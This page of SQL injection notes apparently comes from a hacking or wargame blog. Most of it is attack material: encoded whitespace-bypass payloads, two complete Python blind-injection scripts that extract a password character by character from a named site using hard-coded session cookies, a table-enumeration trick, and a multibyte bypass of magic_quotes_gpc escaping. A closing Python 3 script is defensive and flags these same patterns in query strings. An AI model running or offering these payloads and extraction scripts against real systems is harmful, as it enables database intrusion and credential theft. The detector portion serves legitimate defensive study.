https://codingsec.net/2016/04/sql-injection/
https://codingsec.net/2016/05/brute-forcing-html-form-authentication-using-python/
http://modernpug.github.io/php-the-right-way/
http://php.net/docs.php
http://attrition.org/
https://wikidocs.net/read/750
http://suninatas.com/
Source of the content below: http://binaryu.tistory.com/
SQL Injection whitespace bypass methods
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n) : %0a
- no=1%0aor%0aid='admin'
3. Carriage Return (\r) : %0d
- no=1%0dor%0did='admin'
4. Comment : /**/
- no=1/**/or/**/id='admin'
5. Parentheses : ()
- no=(1)or(id='admin')
6. Plus sign : +
- no=1+or+id='admin'
[PHP2EXE] PHP Compiler/Embedder 1.21
Compiles a program written in PHP and runs it on a PC, without needing a web server.
Useful when modifying and analyzing a small piece of PHP source.
Python Blind Injection Sample
[GET sample]
# Python 2 (urllib2); indentation restored
import re,urllib,urllib2
#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()
password=""
for j in range(1,100):                 # j = character position in pw
    print "%d" %j
    for i in range(33,126):            # i = printable ASCII code being tested
        url="http://binaryu.tistory.com/index.php?no=2+and+substring(pw,%d,1)=char(%d)" %(j,i)
        req=urllib2.Request(url)
        req.add_header('Cookie',"notice=yes; PHPSESSID=863fc9ebeb49ef2bb20976baed9de368")
        read=urllib2.urlopen(req).read()
        ok = re.findall("True",read)   # the page prints "True" when the condition holds
        if ok:
            password=password+chr(i)
            print password
            break
[POST sample]
# Python 2 (urllib2); indentation restored
import re,urllib,urllib2
#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()
password=""
for j in range(1, 33):                 # j = character position in pw
    for i in range(48,123):
        if i < 58 or i > 96:           # digits (48-57) and lowercase letters (97-122) only
            url="http://binaryu.tistory.com/index.php"
            login_form={"id": "admin' and substr(pw,%d,1)=char(%s)#" %(j,i), "pw": ""}
            login_req=urllib.urlencode(login_form)
            req=urllib2.Request(url,login_req)
            req.add_header('Cookie',"notice=yes; PHPSESSID=c473aaff2c3d93c21ad8a0a2cf505036")
            read=urllib2.urlopen(req).read()
            ok = re.findall("Wrong password!",read)   # this message only appears when the id condition is true
            if ok:
                password=password+chr(i)
                print password
                break
MySQL Table Name Search
Appending procedure analyse() to the end of a query, as below,
shows the related DB name, table name and field names.
select * from table procedure analyse();
Bypassing magic_quotes_gpc with the mb_convert_encoding vulnerability
When doing SQL injection in PHP and a ' cannot be entered because of the magic_quotes_gpc setting:
mb_convert_encoding vulnerability (a leading byte in the range %a1 ~ %fe bypasses the magic_quotes_gpc escaping of %27: the lead byte pairs with the backslash that magic_quotes_gpc inserts, so the conversion swallows the backslash and the quote survives)
Blocked : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
Bypass  : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
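As an added example (not part of the original notes and not the blog's code), the following Python 3 script normalizes raw query strings so that the six separator variants listed at the top of the page read as ordinary spaces, and also flags a multibyte lead byte placed directly before a quote, the pattern described under mb_convert_encoding. The sample query strings are constructed from the examples on this page; the keyword match is a heuristic for log review, not a SQL parser.

```python
import re
from urllib.parse import unquote_to_bytes

# SQL keywords that become visible once the separators have been folded to spaces
KEYWORD_RE = re.compile(rb"(?:^|[\s()'\"])(?:or|and|union|select)(?:[\s('\"]|$)", re.I)
# A lead byte 0x81-0xfe immediately before a quote: the multibyte-prefix pattern
# that lets the quote survive the backslash added by magic_quotes_gpc
MULTIBYTE_QUOTE_RE = re.compile(rb"[\x81-\xfe]['\"]")


def normalize(raw_query):
    """Percent-decode a raw query string and fold every whitespace substitute
    (tab, LF, CR, /**/ comment, '+') back to a single space."""
    data = unquote_to_bytes(raw_query.replace("+", " "))   # '+' means space in a query string
    data = re.sub(rb"/\*.*?\*/", b" ", data, flags=re.S)    # inline comments used as separators
    data = re.sub(rb"[\t\n\r\x0b\x0c]+", b" ", data)         # %09 %0a %0d and similar
    return re.sub(rb" {2,}", b" ", data).strip()


def analyze(raw_query):
    """Return the normalized form and which indicators fire for one query string."""
    norm = normalize(raw_query)
    return {
        "normalized": norm,
        "keyword": bool(KEYWORD_RE.search(norm)),
        "multibyte_quote": bool(MULTIBYTE_QUOTE_RE.search(norm)),
    }


def is_suspicious(raw_query):
    result = analyze(raw_query)
    return result["keyword"] or result["multibyte_quote"]


# Constructed samples: the six separator variants from the page, the
# multibyte-prefixed quote, and two benign requests for comparison
SAMPLES = [
    "no=1%09or%09id='admin'",
    "no=1%0aor%0aid='admin'",
    "no=1%0dor%0did='admin'",
    "no=1/**/or/**/id='admin'",
    "no=(1)or(id='admin')",
    "no=1+or+id='admin'",
    "id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest",
    "no=2&sort=date",
    "q=doctor+visit+schedule",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "SUSPICIOUS" if is_suspicious(sample) else "ok"
        print("%-10s %s" % (verdict, analyze(sample)["normalized"].decode("latin-1")))
```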